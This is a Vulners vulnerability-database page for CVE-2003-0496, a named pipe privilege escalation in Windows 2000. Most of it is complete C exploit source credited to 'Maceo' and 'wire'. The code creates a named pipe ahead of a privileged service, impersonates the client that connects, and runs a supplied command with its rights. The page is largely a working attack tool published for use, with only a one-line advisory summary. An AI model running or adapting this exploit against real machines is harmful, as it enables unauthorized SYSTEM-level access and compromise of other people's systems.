Vulners
Lucene search
Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2003-0496 | 10 Jul 200304:00 | – | cve |
 | CVE-2003-0496 | 10 Jul 200304:00 | – | cvelist |
 | Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2) | 8 Jul 200300:00 | – | exploitdb |
 | EUVD-2003-0490 | 7 Oct 202500:30 | – | euvd |
 | Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1) | 8 Jul 200300:00 | – | exploitpack |
| Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2) | 8 Jul 200300:00 | – | exploitpack |
 | CVE-2003-0496 | 18 Aug 200304:00 | – | nvd |
 | Named Pipe Filename Local Privilege Escalation | 8 Jul 200300:00 | – | securityvulns |
 | Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) | 1 Jul 201400:00 | – | seebug |
| Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) | 1 Jul 201400:00 | – | seebug |
10
// source: https://www.securityfocus.com/bid/8128/info
It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.
/* tac0tac0.c - pay no attention to the name, long
story...
*
* Author: Maceo
* Modified to take advantage of CAN-2003-0496 Named
Pipe Filename
* Local Privilege Escalation Found by @stake. Use with
their Advisory.
* [email protected] http://sh0dan.org
*
*
* All credits for code go to Maceo, i really did
minimal work
* with his code, it took me like 3 seconds heh.
* Shouts to #innercircle,
*
*/
#include <stdio.h>
#include <windows.h>
int main(int argc, char **argv)
{
DWORD dwNumber = 0;
DWORD dwType = REG_DWORD;
DWORD dwSize = sizeof(DWORD);
if (argc != 2) {
fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local
Priv Escalation found by @stake.\n"
"This code is to be used with MS-SQL exactly as
outlined in their advisory\n"
"All credit for this code goes to Maceo, he did a
fine job.. -wire\n",argv[0]);
exit(1);
}
// build the next named pipe name //
char szPipe[64];
//sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu",
++dwNumber);
sprintf(szPipe, "\\\\.\\pipe\\poop");
// create the named pipe before scm can //
HANDLE hPipe = 0;
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT,
2, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf ("Failed to create named pipe:\n %s\n",
szPipe);
return 3;
}
ConnectNamedPipe (hPipe, NULL);
// assume the identity of the client //
if (!ImpersonateNamedPipeClient (hPipe))
{
printf ("Failed to impersonate the named pipe.\n");
CloseHandle(hPipe);
return 5;
}
// display impersonating users name //
dwSize = 256;
char szUser[256];
GetUserName(szUser, &dwSize);
printf ("Impersonating: %s\n", szUser);
system(argv[1]);
CloseHandle(hPipe);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2003 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 27.2
EPSS0.02182